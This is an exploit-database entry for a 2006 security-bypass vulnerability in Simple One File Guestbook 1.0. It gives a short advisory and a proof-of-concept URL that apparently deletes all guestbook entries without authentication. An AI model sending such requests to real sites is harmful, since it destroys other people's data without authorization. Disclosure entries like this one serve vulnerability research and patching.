Simple One File Guestbook 1.0 - Security Bypass

EDB-ID:

28362




Platform:

PHP

Date:

2006-08-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/19437/info

Simple one-file guestbook is prone to a security-bypass vulnerability. An attacker can bypass authentication measures by using a specific URL to delete all guestbook entries.

Version 1.0 of Simple one-file guestbook is vulnerable. Other versions may be affected as well.

#Simple One-File Guestbook Adminstrator Credential Bypass
#Proof of Concept URL

http://www.example.com/[path]/guestbook.php?id=4